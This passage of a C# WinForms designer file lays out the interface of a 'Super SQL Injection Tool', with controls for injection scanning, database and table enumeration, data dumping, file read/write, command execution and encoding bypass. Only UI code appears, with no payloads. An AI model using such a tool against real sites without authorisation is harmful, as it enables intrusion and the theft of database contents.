this.scanInject_lsb_links.Name = "scanInject_lsb_links"; + this.scanInject_lsb_links.ScrollAlwaysVisible = true; + this.scanInject_lsb_links.Size = new System.Drawing.Size(237, 309); + this.scanInject_lsb_links.TabIndex = 0; + // + // scanInjectionURL_cms + // + this.scanInjectionURL_cms.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.tsmi_exportScanInjectionURL, + this.tsmi_clearScanInjectionURL}); + this.scanInjectionURL_cms.Name = "scanInjectionURL_cms"; + this.scanInjectionURL_cms.Size = new System.Drawing.Size(124, 48); + // + // tsmi_exportScanInjectionURL + // + this.tsmi_exportScanInjectionURL.Name = "tsmi_exportScanInjectionURL"; + this.tsmi_exportScanInjectionURL.Size = new System.Drawing.Size(123, 22); + this.tsmi_exportScanInjectionURL.Text = "导出URL"; + this.tsmi_exportScanInjectionURL.Click += new System.EventHandler(this.tsmi_exportScanInjectionURL_Click); + // + // tsmi_clearScanInjectionURL + // + this.tsmi_clearScanInjectionURL.Name = "tsmi_clearScanInjectionURL"; + this.tsmi_clearScanInjectionURL.Size = new System.Drawing.Size(123, 22); + this.tsmi_clearScanInjectionURL.Text = "清 空"; + this.tsmi_clearScanInjectionURL.Click += new System.EventHandler(this.tsmi_clearScanInjectionURL_Click); + // + // scanInjection_lvw_result + // + this.scanInjection_lvw_result.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] { + this.col_index, + this.col_url, + this.col_testURL, + this.col_param, + this.col_injectionType, + this.col_injectionDB, + this.col_mark}); + this.scanInjection_lvw_result.ContextMenuStrip = this.scanInjection_cms; + this.scanInjection_lvw_result.Dock = System.Windows.Forms.DockStyle.Fill; + this.scanInjection_lvw_result.FullRowSelect = true; + this.scanInjection_lvw_result.GridLines = true; + this.scanInjection_lvw_result.Location = new System.Drawing.Point(0, 0); + this.scanInjection_lvw_result.Name = "scanInjection_lvw_result"; + this.scanInjection_lvw_result.Size = new System.Drawing.Size(555, 309); + 
this.scanInjection_lvw_result.TabIndex = 5; + this.scanInjection_lvw_result.UseCompatibleStateImageBehavior = false; + this.scanInjection_lvw_result.View = System.Windows.Forms.View.Details; + this.scanInjection_lvw_result.ColumnClick += new System.Windows.Forms.ColumnClickEventHandler(this.scanInjection_lvw_result_ColumnClick); + this.scanInjection_lvw_result.DoubleClick += new System.EventHandler(this.scanInjection_lvw_result_DoubleClick); + // + // col_index + // + this.col_index.Text = "序号"; + this.col_index.Width = 46; + // + // col_url + // + this.col_url.Text = "原始URL"; + this.col_url.Width = 100; + // + // col_testURL + // + this.col_testURL.Text = "测试URL"; + this.col_testURL.Width = 150; + // + // col_param + // + this.col_param.Text = "注入参数"; + // + // col_injectionType + // + this.col_injectionType.Text = "注入类型"; + this.col_injectionType.Width = 65; + // + // col_injectionDB + // + this.col_injectionDB.Text = "数据库类型"; + this.col_injectionDB.Width = 75; + // + // col_mark + // + this.col_mark.Text = "备注"; + // + // scanInjection_cms + // + this.scanInjection_cms.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.scanInjection_cms_exportResult, + this.tsmi_tsmi_exortTestURL, + this.tsmi_tsmi_exortOldURL, + this.scanInjection_cms_copyURL, + this.scanInjection_cms_clearResult, + this.scanInjection_cms_delThisLine, + this.tsmi_openURL, + this.tsmi_tsmi_opentestURL}); + this.scanInjection_cms.Name = "scanInjection_cms"; + this.scanInjection_cms.Size = new System.Drawing.Size(149, 180); + // + // scanInjection_cms_exportResult + // + this.scanInjection_cms_exportResult.Name = "scanInjection_cms_exportResult"; + this.scanInjection_cms_exportResult.Size = new System.Drawing.Size(148, 22); + this.scanInjection_cms_exportResult.Text = "导出扫描结果"; + this.scanInjection_cms_exportResult.Click += new System.EventHandler(this.scanInjection_cms_exportResult_Click); + // + // tsmi_tsmi_exortTestURL + // + this.tsmi_tsmi_exortTestURL.Name = 
"tsmi_tsmi_exortTestURL"; + this.tsmi_tsmi_exortTestURL.Size = new System.Drawing.Size(148, 22); + this.tsmi_tsmi_exortTestURL.Text = "导出测试URL"; + this.tsmi_tsmi_exortTestURL.Click += new System.EventHandler(this.tsmi_tsmi_exortTestURL_Click); + // + // tsmi_tsmi_exortOldURL + // + this.tsmi_tsmi_exortOldURL.Name = "tsmi_tsmi_exortOldURL"; + this.tsmi_tsmi_exortOldURL.Size = new System.Drawing.Size(148, 22); + this.tsmi_tsmi_exortOldURL.Text = "导出原始URL"; + this.tsmi_tsmi_exortOldURL.Click += new System.EventHandler(this.tsmi_tsmi_exortOldURL_Click); + // + // scanInjection_cms_copyURL + // + this.scanInjection_cms_copyURL.Name = "scanInjection_cms_copyURL"; + this.scanInjection_cms_copyURL.Size = new System.Drawing.Size(148, 22); + this.scanInjection_cms_copyURL.Text = "复制URL"; + this.scanInjection_cms_copyURL.Click += new System.EventHandler(this.scanInjection_cms_copyURL_Click); + // + // scanInjection_cms_clearResult + // + this.scanInjection_cms_clearResult.Name = "scanInjection_cms_clearResult"; + this.scanInjection_cms_clearResult.Size = new System.Drawing.Size(148, 22); + this.scanInjection_cms_clearResult.Text = "清空结果"; + this.scanInjection_cms_clearResult.Click += new System.EventHandler(this.scanInjection_cms_clearResult_Click); + // + // scanInjection_cms_delThisLine + // + this.scanInjection_cms_delThisLine.Name = "scanInjection_cms_delThisLine"; + this.scanInjection_cms_delThisLine.Size = new System.Drawing.Size(148, 22); + this.scanInjection_cms_delThisLine.Text = "删除选中行"; + this.scanInjection_cms_delThisLine.Click += new System.EventHandler(this.scanInjection_cms_delThisLine_Click); + // + // tsmi_openURL + // + this.tsmi_openURL.Name = "tsmi_openURL"; + this.tsmi_openURL.Size = new System.Drawing.Size(148, 22); + this.tsmi_openURL.Text = "打开原始URL"; + this.tsmi_openURL.Click += new System.EventHandler(this.tsmi_openURL_Click); + // + // tsmi_tsmi_opentestURL + // + this.tsmi_tsmi_opentestURL.Name = "tsmi_tsmi_opentestURL"; + 
this.tsmi_tsmi_opentestURL.Size = new System.Drawing.Size(148, 22); + this.tsmi_tsmi_opentestURL.Text = "打开测试URL"; + this.tsmi_tsmi_opentestURL.Click += new System.EventHandler(this.tsmi_tsmi_opentestURL_Click); + // + // groupBox12 + // + this.groupBox12.Controls.Add(this.scanInect_chk_isSpider); + this.groupBox12.Controls.Add(this.scanInect_chk_scanError); + this.groupBox12.Controls.Add(this.scanInjection_btn_spider); + this.groupBox12.Controls.Add(this.scanInjection_btn_scan); + this.groupBox12.Controls.Add(this.scanInjection_importDomains); + this.groupBox12.Controls.Add(this.scanInjection_scanedURLSCount); + this.groupBox12.Controls.Add(this.scanInjection_txt_domainsPath); + this.groupBox12.Controls.Add(this.scanInjection_findURLSCount); + this.groupBox12.Controls.Add(this.label20); + this.groupBox12.Controls.Add(this.label30); + this.groupBox12.Controls.Add(this.label22); + this.groupBox12.Controls.Add(this.label26); + this.groupBox12.Controls.Add(this.scanInjection_domainsCount); + this.groupBox12.Controls.Add(this.scanInjection_scanedDomainCount); + this.groupBox12.Controls.Add(this.label25); + this.groupBox12.Dock = System.Windows.Forms.DockStyle.Top; + this.groupBox12.Location = new System.Drawing.Point(0, 0); + this.groupBox12.Name = "groupBox12"; + this.groupBox12.Size = new System.Drawing.Size(802, 95); + this.groupBox12.TabIndex = 21; + this.groupBox12.TabStop = false; + this.groupBox12.Text = " "; + // + // scanInect_chk_isSpider + // + this.scanInect_chk_isSpider.AutoSize = true; + this.scanInect_chk_isSpider.Checked = true; + this.scanInect_chk_isSpider.CheckState = System.Windows.Forms.CheckState.Checked; + this.scanInect_chk_isSpider.Location = new System.Drawing.Point(329, 26); + this.scanInect_chk_isSpider.Name = "scanInect_chk_isSpider"; + this.scanInect_chk_isSpider.Size = new System.Drawing.Size(96, 16); + this.scanInect_chk_isSpider.TabIndex = 19; + this.scanInect_chk_isSpider.Text = "是否爬行一次"; + 
this.scanInect_chk_isSpider.UseVisualStyleBackColor = true; + // + // scanInect_chk_scanError + // + this.scanInect_chk_scanError.AutoSize = true; + this.scanInect_chk_scanError.Location = new System.Drawing.Point(490, 25); + this.scanInect_chk_scanError.Name = "scanInect_chk_scanError"; + this.scanInect_chk_scanError.Size = new System.Drawing.Size(84, 16); + this.scanInect_chk_scanError.TabIndex = 20; + this.scanInect_chk_scanError.Text = "只扫错误型"; + this.scanInect_chk_scanError.UseVisualStyleBackColor = true; + // + // scanInjection_btn_spider + // + this.scanInjection_btn_spider.Location = new System.Drawing.Point(703, 16); + this.scanInjection_btn_spider.Name = "scanInjection_btn_spider"; + this.scanInjection_btn_spider.Size = new System.Drawing.Size(75, 23); + this.scanInjection_btn_spider.TabIndex = 1; + this.scanInjection_btn_spider.Text = "爬行链接"; + this.scanInjection_btn_spider.UseVisualStyleBackColor = true; + this.scanInjection_btn_spider.Click += new System.EventHandler(this.scanInjection_btn_spider_Click); + // + // scanInjection_btn_scan + // + this.scanInjection_btn_scan.Location = new System.Drawing.Point(703, 57); + this.scanInjection_btn_scan.Name = "scanInjection_btn_scan"; + this.scanInjection_btn_scan.Size = new System.Drawing.Size(75, 23); + this.scanInjection_btn_scan.TabIndex = 1; + this.scanInjection_btn_scan.Text = "扫描注入"; + this.scanInjection_btn_scan.UseVisualStyleBackColor = true; + this.scanInjection_btn_scan.Click += new System.EventHandler(this.scanInjection_btn_scan_Click); + // + // scanInjection_importDomains + // + this.scanInjection_importDomains.Location = new System.Drawing.Point(183, 22); + this.scanInjection_importDomains.Name = "scanInjection_importDomains"; + this.scanInjection_importDomains.Size = new System.Drawing.Size(61, 23); + this.scanInjection_importDomains.TabIndex = 2; + this.scanInjection_importDomains.Text = "导入"; + this.scanInjection_importDomains.UseVisualStyleBackColor = true; + 
this.scanInjection_importDomains.Click += new System.EventHandler(this.scanInjection_importDomains_Click); + // + // scanInjection_scanedURLSCount + // + this.scanInjection_scanedURLSCount.AutoSize = true; + this.scanInjection_scanedURLSCount.Location = new System.Drawing.Point(562, 66); + this.scanInjection_scanedURLSCount.Name = "scanInjection_scanedURLSCount"; + this.scanInjection_scanedURLSCount.Size = new System.Drawing.Size(11, 12); + this.scanInjection_scanedURLSCount.TabIndex = 16; + this.scanInjection_scanedURLSCount.Text = "0"; + // + // scanInjection_txt_domainsPath + // + this.scanInjection_txt_domainsPath.Location = new System.Drawing.Point(66, 23); + this.scanInjection_txt_domainsPath.Name = "scanInjection_txt_domainsPath"; + this.scanInjection_txt_domainsPath.Size = new System.Drawing.Size(111, 21); + this.scanInjection_txt_domainsPath.TabIndex = 3; + // + // scanInjection_findURLSCount + // + this.scanInjection_findURLSCount.AutoSize = true; + this.scanInjection_findURLSCount.Location = new System.Drawing.Point(407, 67); + this.scanInjection_findURLSCount.Name = "scanInjection_findURLSCount"; + this.scanInjection_findURLSCount.Size = new System.Drawing.Size(11, 12); + this.scanInjection_findURLSCount.TabIndex = 16; + this.scanInjection_findURLSCount.Text = "0"; + // + // label20 + // + this.label20.AutoSize = true; + this.label20.Location = new System.Drawing.Point(26, 26); + this.label20.Name = "label20"; + this.label20.Size = new System.Drawing.Size(35, 12); + this.label20.TabIndex = 4; + this.label20.Text = "URL:"; + // + // label30 + // + this.label30.AutoSize = true; + this.label30.Location = new System.Drawing.Point(488, 66); + this.label30.Name = "label30"; + this.label30.Size = new System.Drawing.Size(71, 12); + this.label30.TabIndex = 15; + this.label30.Text = "已扫描URL:"; + // + // label22 + // + this.label22.AutoSize = true; + this.label22.Location = new System.Drawing.Point(26, 66); + this.label22.Name = "label22"; + this.label22.Size = 
new System.Drawing.Size(95, 12); + this.label22.TabIndex = 11; + this.label22.Text = "域名或URL总数:"; + // + // label26 + // + this.label26.AutoSize = true; + this.label26.Location = new System.Drawing.Point(327, 67); + this.label26.Name = "label26"; + this.label26.Size = new System.Drawing.Size(71, 12); + this.label26.TabIndex = 15; + this.label26.Text = "待扫描URL:"; + // + // scanInjection_domainsCount + // + this.scanInjection_domainsCount.AutoSize = true; + this.scanInjection_domainsCount.Location = new System.Drawing.Point(127, 67); + this.scanInjection_domainsCount.Name = "scanInjection_domainsCount"; + this.scanInjection_domainsCount.Size = new System.Drawing.Size(11, 12); + this.scanInjection_domainsCount.TabIndex = 12; + this.scanInjection_domainsCount.Text = "0"; + // + // scanInjection_scanedDomainCount + // + this.scanInjection_scanedDomainCount.AutoSize = true; + this.scanInjection_scanedDomainCount.Location = new System.Drawing.Point(233, 67); + this.scanInjection_scanedDomainCount.Name = "scanInjection_scanedDomainCount"; + this.scanInjection_scanedDomainCount.Size = new System.Drawing.Size(11, 12); + this.scanInjection_scanedDomainCount.TabIndex = 14; + this.scanInjection_scanedDomainCount.Text = "0"; + // + // label25 + // + this.label25.AutoSize = true; + this.label25.Location = new System.Drawing.Point(177, 67); + this.label25.Name = "label25"; + this.label25.Size = new System.Drawing.Size(53, 12); + this.label25.TabIndex = 13; + this.label25.Text = "已爬行:"; + // + // statusStrip1 + // + this.statusStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.toolStripStatusLabel1, + this.status_lbl_time, + this.toolStripStatusLabel2, + this.status_lbl_threadStatus, + this.toolStripStatusLabel3, + this.toolStripStatusLabel4, + this.status_lbl_dbsCount, + this.toolStripStatusLabel5, + this.status_lbl_tableCount, + this.toolStripStatusLabel6, + this.status_lbl_dataCount, + this.toolStripStatusLabel7, + this.status_lbl_runStatus, + 
this.toolStripStatusLabel8, + this.status_lbl_all_status, + this.toolStripStatusLabel11, + this.lbl_packsCount}); + this.statusStrip1.Location = new System.Drawing.Point(0, 659); + this.statusStrip1.Name = "statusStrip1"; + this.statusStrip1.Size = new System.Drawing.Size(834, 22); + this.statusStrip1.TabIndex = 4; + this.statusStrip1.Text = "statusStrip1"; + // + // toolStripStatusLabel1 + // + this.toolStripStatusLabel1.Name = "toolStripStatusLabel1"; + this.toolStripStatusLabel1.Size = new System.Drawing.Size(68, 17); + this.toolStripStatusLabel1.Text = "运行时间:"; + // + // status_lbl_time + // + this.status_lbl_time.Name = "status_lbl_time"; + this.status_lbl_time.Size = new System.Drawing.Size(15, 17); + this.status_lbl_time.Text = "0"; + // + // toolStripStatusLabel2 + // + this.toolStripStatusLabel2.Name = "toolStripStatusLabel2"; + this.toolStripStatusLabel2.Size = new System.Drawing.Size(68, 17); + this.toolStripStatusLabel2.Text = "当前线程:"; + // + // status_lbl_threadStatus + // + this.status_lbl_threadStatus.Name = "status_lbl_threadStatus"; + this.status_lbl_threadStatus.Size = new System.Drawing.Size(27, 17); + this.status_lbl_threadStatus.Text = "0/0"; + // + // toolStripStatusLabel3 + // + this.toolStripStatusLabel3.Name = "toolStripStatusLabel3"; + this.toolStripStatusLabel3.Size = new System.Drawing.Size(0, 17); + // + // toolStripStatusLabel4 + // + this.toolStripStatusLabel4.Name = "toolStripStatusLabel4"; + this.toolStripStatusLabel4.Size = new System.Drawing.Size(56, 17); + this.toolStripStatusLabel4.Text = "数据库:"; + // + // status_lbl_dbsCount + // + this.status_lbl_dbsCount.Name = "status_lbl_dbsCount"; + this.status_lbl_dbsCount.Size = new System.Drawing.Size(15, 17); + this.status_lbl_dbsCount.Text = "0"; + // + // toolStripStatusLabel5 + // + this.toolStripStatusLabel5.Name = "toolStripStatusLabel5"; + this.toolStripStatusLabel5.Size = new System.Drawing.Size(56, 17); + this.toolStripStatusLabel5.Text = "表数量:"; + // + // status_lbl_tableCount 
+ // + this.status_lbl_tableCount.Name = "status_lbl_tableCount"; + this.status_lbl_tableCount.Size = new System.Drawing.Size(15, 17); + this.status_lbl_tableCount.Text = "0"; + // + // toolStripStatusLabel6 + // + this.toolStripStatusLabel6.Name = "toolStripStatusLabel6"; + this.toolStripStatusLabel6.Size = new System.Drawing.Size(68, 17); + this.toolStripStatusLabel6.Text = "数据获取:"; + // + // status_lbl_dataCount + // + this.status_lbl_dataCount.Name = "status_lbl_dataCount"; + this.status_lbl_dataCount.Size = new System.Drawing.Size(15, 17); + this.status_lbl_dataCount.Text = "0"; + // + // toolStripStatusLabel7 + // + this.toolStripStatusLabel7.Name = "toolStripStatusLabel7"; + this.toolStripStatusLabel7.Size = new System.Drawing.Size(44, 17); + this.toolStripStatusLabel7.Text = "状态:"; + // + // status_lbl_runStatus + // + this.status_lbl_runStatus.Name = "status_lbl_runStatus"; + this.status_lbl_runStatus.Size = new System.Drawing.Size(44, 17); + this.status_lbl_runStatus.Text = "未开始"; + // + // toolStripStatusLabel8 + // + this.toolStripStatusLabel8.Name = "toolStripStatusLabel8"; + this.toolStripStatusLabel8.Size = new System.Drawing.Size(44, 17); + this.toolStripStatusLabel8.Text = "进度:"; + // + // status_lbl_all_status + // + this.status_lbl_all_status.Name = "status_lbl_all_status"; + this.status_lbl_all_status.Size = new System.Drawing.Size(27, 17); + this.status_lbl_all_status.Text = "0/0"; + // + // toolStripStatusLabel11 + // + this.toolStripStatusLabel11.Name = "toolStripStatusLabel11"; + this.toolStripStatusLabel11.Size = new System.Drawing.Size(56, 17); + this.toolStripStatusLabel11.Text = "已发包:"; + // + // lbl_packsCount + // + this.lbl_packsCount.Name = "lbl_packsCount"; + this.lbl_packsCount.Size = new System.Drawing.Size(15, 17); + this.lbl_packsCount.Text = "0"; + // + // timer_status + // + this.timer_status.Enabled = true; + this.timer_status.Interval = 1000; + this.timer_status.Tick += new System.EventHandler(this.timer_status_Tick); + // + 
// timer_scanInjection + // + this.timer_scanInjection.Enabled = true; + this.timer_scanInjection.Interval = 1000; + this.timer_scanInjection.Tick += new System.EventHandler(this.timer_scanInjection_Tick); + // + // cbox_bypass_urlencode_count + // + this.cbox_bypass_urlencode_count.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList; + this.cbox_bypass_urlencode_count.FormattingEnabled = true; + this.cbox_bypass_urlencode_count.Items.AddRange(new object[] { + "一次", + "二次"}); + this.cbox_bypass_urlencode_count.Location = new System.Drawing.Point(329, 23); + this.cbox_bypass_urlencode_count.Name = "cbox_bypass_urlencode_count"; + this.cbox_bypass_urlencode_count.Size = new System.Drawing.Size(78, 20); + this.cbox_bypass_urlencode_count.TabIndex = 23; + this.cbox_bypass_urlencode_count.TextChanged += new System.EventHandler(this.cbox_bypass_urlencode_count_TextChanged); + // + // Main + // + this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F); + this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; + this.ClientSize = new System.Drawing.Size(834, 681); + this.Controls.Add(this.statusStrip1); + this.Controls.Add(this.gb_logo); + this.Controls.Add(this.mytab); + this.Controls.Add(this.gb_basic); + this.Controls.Add(this.menuStrip_main); + this.MainMenuStrip = this.menuStrip_main; + this.Name = "Main"; + this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen; + this.Text = "超级SQL注入工具 v1.0 正式版 20160525"; + this.FormClosing += new System.Windows.Forms.FormClosingEventHandler(this.Main_FormClosing); + this.Shown += new System.EventHandler(this.Main_Shown); + this.gb_basic.ResumeLayout(false); + this.gb_basic.PerformLayout(); + this.menuStrip_main.ResumeLayout(false); + this.menuStrip_main.PerformLayout(); + this.gb_logo.ResumeLayout(false); + this.gb_logo.PerformLayout(); + this.tab_logCenter.ResumeLayout(false); + this.splitContainer1.Panel1.ResumeLayout(false); + this.splitContainer1.Panel2.ResumeLayout(false); + 
((System.ComponentModel.ISupportInitialize)(this.splitContainer1)).EndInit(); + this.splitContainer1.ResumeLayout(false); + this.groupBox5.ResumeLayout(false); + this.log_cms_dataifo.ResumeLayout(false); + this.groupBox6.ResumeLayout(false); + this.tabControl2.ResumeLayout(false); + this.tabPage3.ResumeLayout(false); + this.tabPage3.PerformLayout(); + this.tabPage4.ResumeLayout(false); + this.tabPage4.PerformLayout(); + this.tabPage1.ResumeLayout(false); + this.tab_file.ResumeLayout(false); + this.tab_file.PerformLayout(); + this.groupBox7.ResumeLayout(false); + this.groupBox7.PerformLayout(); + this.tab_dataCenter.ResumeLayout(false); + this.tabC_dataCenter.ResumeLayout(false); + this.tab_vers.ResumeLayout(false); + this.data_cms_vers.ResumeLayout(false); + this.tab_dbs.ResumeLayout(false); + this.spc_dbs.Panel1.ResumeLayout(false); + this.spc_dbs.Panel1.PerformLayout(); + this.spc_dbs.Panel2.ResumeLayout(false); + this.spc_dbs.Panel2.PerformLayout(); + ((System.ComponentModel.ISupportInitialize)(this.spc_dbs)).EndInit(); + this.spc_dbs.ResumeLayout(false); + this.data_dbs_ts.ResumeLayout(false); + this.data_dbs_ts.PerformLayout(); + this.groupBox2.ResumeLayout(false); + this.data_cms_dbs.ResumeLayout(false); + this.toolStrip1.ResumeLayout(false); + this.toolStrip1.PerformLayout(); + this.groupBox4.ResumeLayout(false); + this.cms_data_dbs_lvw_data.ResumeLayout(false); + this.tab_injectCenter.ResumeLayout(false); + this.groupBox1.ResumeLayout(false); + this.groupBox1.PerformLayout(); + this.cms_dataPacks.ResumeLayout(false); + this.groupBox3.ResumeLayout(false); + this.groupBox3.PerformLayout(); + this.groupBox16.ResumeLayout(false); + this.groupBox16.PerformLayout(); + this.groupBox15.ResumeLayout(false); + this.groupBox15.PerformLayout(); + this.mytab.ResumeLayout(false); + this.tab_cmd.ResumeLayout(false); + this.tab_cmd.PerformLayout(); + this.groupBox8.ResumeLayout(false); + this.groupBox8.PerformLayout(); + this.tab_bypass.ResumeLayout(false); + 
this.groupBox9.ResumeLayout(false); + this.groupBox9.PerformLayout(); + this.bypass_lvw_replaceString_cms.ResumeLayout(false); + this.tab_encoding.ResumeLayout(false); + this.groupBox13.ResumeLayout(false); + this.groupBox13.PerformLayout(); + this.groupBox11.ResumeLayout(false); + this.groupBox11.PerformLayout(); + this.groupBox10.ResumeLayout(false); + this.groupBox10.PerformLayout(); + this.tab_scanInjection.ResumeLayout(false); + this.groupBox14.ResumeLayout(false); + this.splitContainer2.Panel1.ResumeLayout(false); + this.splitContainer2.Panel2.ResumeLayout(false); + ((System.ComponentModel.ISupportInitialize)(this.splitContainer2)).EndInit(); + this.splitContainer2.ResumeLayout(false); + this.scanInjectionURL_cms.ResumeLayout(false); + this.scanInjection_cms.ResumeLayout(false); + this.groupBox12.ResumeLayout(false); + this.groupBox12.PerformLayout(); + this.statusStrip1.ResumeLayout(false); + this.statusStrip1.PerformLayout(); + this.ResumeLayout(false); + this.PerformLayout(); + + } + + #endregion + + private System.Windows.Forms.GroupBox gb_basic; + private System.Windows.Forms.TextBox txt_basic_host; + private System.Windows.Forms.Label label1; + private System.Windows.Forms.MenuStrip menuStrip_main; + private System.Windows.Forms.ToolStripMenuItem tsmi_menu; + private System.Windows.Forms.ToolStripMenuItem tsmi_openConfig; + private System.Windows.Forms.ToolStripMenuItem tsmi_saveConfig; + private System.Windows.Forms.ToolStripMenuItem tsmi_tools; + private System.Windows.Forms.ToolStripMenuItem 脱裤助手ToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem tsmi_help; + private System.Windows.Forms.ToolStripMenuItem tsmi_readme; + private System.Windows.Forms.ToolStripMenuItem tsmi_about; + private System.Windows.Forms.ToolStripMenuItem tsmi_update; + private System.Windows.Forms.Label label6; + private System.Windows.Forms.ComboBox cbox_basic_dbType; + private System.Windows.Forms.Label label7; + private System.Windows.Forms.ComboBox 
cbox_basic_injectType; + private System.Windows.Forms.GroupBox gb_logo; + private System.Windows.Forms.TextBox txt_log; + private System.Windows.Forms.TextBox txt_basic_port; + private System.Windows.Forms.Label label2; + private System.Windows.Forms.Button btn_autoInject; + private System.Windows.Forms.Label label3; + private System.Windows.Forms.Label label5; + private System.Windows.Forms.Label label9; + private System.Windows.Forms.Label label11; + private System.Windows.Forms.ComboBox cbox_basic_encoding; + private System.Windows.Forms.ComboBox cbox_basic_timeOut; + private System.Windows.Forms.ComboBox cbox_basic_reTryCount; + private System.Windows.Forms.ComboBox cbox_basic_threadSize; + private System.Windows.Forms.Button btn_exportConfig; + private System.Windows.Forms.TabPage tab_logCenter; + private System.Windows.Forms.TabPage tab_file; + private System.Windows.Forms.TabPage tab_dataCenter; + private System.Windows.Forms.TabPage tab_injectCenter; + private System.Windows.Forms.GroupBox groupBox1; + private System.Windows.Forms.GroupBox groupBox3; + private System.Windows.Forms.Label label13; + private System.Windows.Forms.Label label12; + private System.Windows.Forms.Button btn_inject_clearRequest; + private System.Windows.Forms.Button btn_inject_sendData; + private System.Windows.Forms.CheckBox chk_inject_foward_302; + private System.Windows.Forms.Label label4; + private System.Windows.Forms.Button btn_inject_setInject; + private System.Windows.Forms.TextBox txt_inject_key; + private System.Windows.Forms.TextBox txt_inject_unionColumnsCount; + private System.Windows.Forms.Label label8; + private System.Windows.Forms.TextBox txt_inject_showColumn; + private System.Windows.Forms.TabControl mytab; + private System.Windows.Forms.GroupBox groupBox6; + private System.Windows.Forms.GroupBox groupBox5; + private System.Windows.Forms.ListView log_lvw_httpLog; + private System.Windows.Forms.ColumnHeader log_col_payload; + private System.Windows.Forms.TabControl 
tabControl2; + private System.Windows.Forms.TabPage tabPage3; + private System.Windows.Forms.TabPage tabPage4; + private System.Windows.Forms.ToolStripMenuItem toolStripMenuItem1; + private System.Windows.Forms.ToolStripMenuItem tsmi_seting; + private System.Windows.Forms.ToolStripMenuItem tsmi_mustRead; + private System.Windows.Forms.Button btn_inject_setEncodingRange; + private System.Windows.Forms.ContextMenuStrip data_cms_vers; + private System.Windows.Forms.ToolStripMenuItem data_cms_tsmi_getVariable; + private System.Windows.Forms.ToolStripMenuItem data_cms_tsmi_stopGetVariable; + private System.Windows.Forms.ContextMenuStrip data_cms_dbs; + private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_addDBS; + private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_deleteNode; + private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_getTableNames; + private System.Windows.Forms.ImageList myicon_list; + private System.Windows.Forms.TabControl tabC_dataCenter; + private System.Windows.Forms.TabPage tab_vers; + private System.Windows.Forms.ListView data_lvw_ver; + private System.Windows.Forms.ColumnHeader data_lvw_ver_verName; + private System.Windows.Forms.ColumnHeader data_lvw_ver_verValue; + private System.Windows.Forms.TabPage tab_dbs; + private System.Windows.Forms.ToolStrip data_dbs_ts; + private System.Windows.Forms.ToolStripButton data_dbs_tsl_getTables; + private System.Windows.Forms.ToolStripButton data_dbs_tsl_getColumns; + private System.Windows.Forms.GroupBox groupBox4; + private System.Windows.Forms.ListView data_dbs_lvw_data; + private System.Windows.Forms.GroupBox groupBox2; + private System.Windows.Forms.TreeView data_tvw_dbs; + private System.Windows.Forms.ColumnHeader log_col_code; + private System.Windows.Forms.ColumnHeader log_col_bodyLength; + private System.Windows.Forms.TextBox log_txt_request; + private System.Windows.Forms.TextBox log_txt_response; + private System.Windows.Forms.ColumnHeader log_col_index; + private 
System.Windows.Forms.TextBox txt_inject_request; + private System.Windows.Forms.ColumnHeader col_runtime; + private System.Windows.Forms.ContextMenuStrip log_cms_dataifo; + private System.Windows.Forms.ToolStripMenuItem data_cms_clearLog; + private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_stopGetInfos; + private System.Windows.Forms.SplitContainer splitContainer1; + private System.Windows.Forms.SplitContainer spc_dbs; + private System.Windows.Forms.ToolStrip toolStrip1; + private System.Windows.Forms.ToolStripLabel toolStripLabel1; + private System.Windows.Forms.ToolStripTextBox data_dbs_txt_count; + private System.Windows.Forms.ToolStripButton data_dbs_tsl_getDatas; + private System.Windows.Forms.ToolStripButton data_dbs_tsl_exportDatas; + private System.Windows.Forms.ToolStripButton data_dbs_tsl_getDBS; + private System.Windows.Forms.ToolStripLabel toolStripLabel2; + private System.Windows.Forms.ToolStripComboBox data_dbs_cob_db_encoding; + private System.Windows.Forms.CheckBox chk_openURLEncoding; + private System.Windows.Forms.ToolStripMenuItem data_cms_tsmi_copyVerValue; + private System.Windows.Forms.TabPage tab_encoding; + private System.Windows.Forms.TabPage tab_cmd; + private System.Windows.Forms.CheckBox chk_useSSL; + private System.Windows.Forms.TabPage tabPage1; + private System.Windows.Forms.WebBrowser webBro_log; + private System.Windows.Forms.ToolStripLabel toolStripLabel3; + private System.Windows.Forms.ToolStripTextBox data_dbs_txt_start; + private System.Windows.Forms.ImageList imglist_database; + private System.Windows.Forms.ContextMenuStrip cms_data_dbs_lvw_data; + private System.Windows.Forms.ToolStripMenuItem data_dbs_lvw_tsmi_stop; + private System.Windows.Forms.ToolStripMenuItem data_dbs_lvw_tsmi_copyLineData; + private System.Windows.Forms.CheckBox chk_inject_reverseKey; + private System.Windows.Forms.GroupBox groupBox7; + private System.Windows.Forms.Label label14; + private System.Windows.Forms.TextBox file_txt_filePath; + 
private System.Windows.Forms.ComboBox file_cbox_readWrite; + private System.Windows.Forms.Button file_btn_start; + private System.Windows.Forms.TextBox file_txt_result; + private System.Windows.Forms.GroupBox groupBox8; + private System.Windows.Forms.Button cmd_btn_start; + private System.Windows.Forms.TextBox cmd_txt_cmd; + private System.Windows.Forms.Label label15; + private System.Windows.Forms.TextBox cmd_txt_result; + private System.Windows.Forms.StatusStrip statusStrip1; + private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel1; + private System.Windows.Forms.ToolStripStatusLabel status_lbl_time; + private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel2; + private System.Windows.Forms.ToolStripStatusLabel status_lbl_threadStatus; + private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel3; + private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel4; + private System.Windows.Forms.ToolStripStatusLabel status_lbl_dbsCount; + private System.Windows.Forms.ToolStripStatusLabel status_lbl_tableCount; + private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel5; + private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel6; + private System.Windows.Forms.ToolStripStatusLabel status_lbl_dataCount; + private System.Windows.Forms.Timer timer_status; + private 